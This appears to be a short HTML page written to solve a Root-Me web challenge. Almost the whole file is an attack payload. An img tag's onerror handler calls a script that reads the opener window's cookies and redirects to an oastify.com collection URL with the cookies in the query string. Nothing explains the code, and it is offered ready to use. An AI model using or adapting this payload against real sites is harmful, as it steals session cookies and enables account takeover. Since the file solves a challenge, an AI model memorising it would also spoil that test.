<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>aaaaaahhhh</title>
</head>
<body>
    <img src=x onerror=myFunc()>   
    <span> ça écrit ici : </span>
    <span id="oui"></span>

<script>
    function myFunc() {
                        origin = "http://challenge01.root-me.org:58003";
                        const cook = window.opener.document.cookie;
                        window.document.location.href = "http://pc5c3c3q2kl4ws3s064pgbph288zwrkg.oastify.com/?cookie1="+cook;
                      }
</script>

</body>
</html>
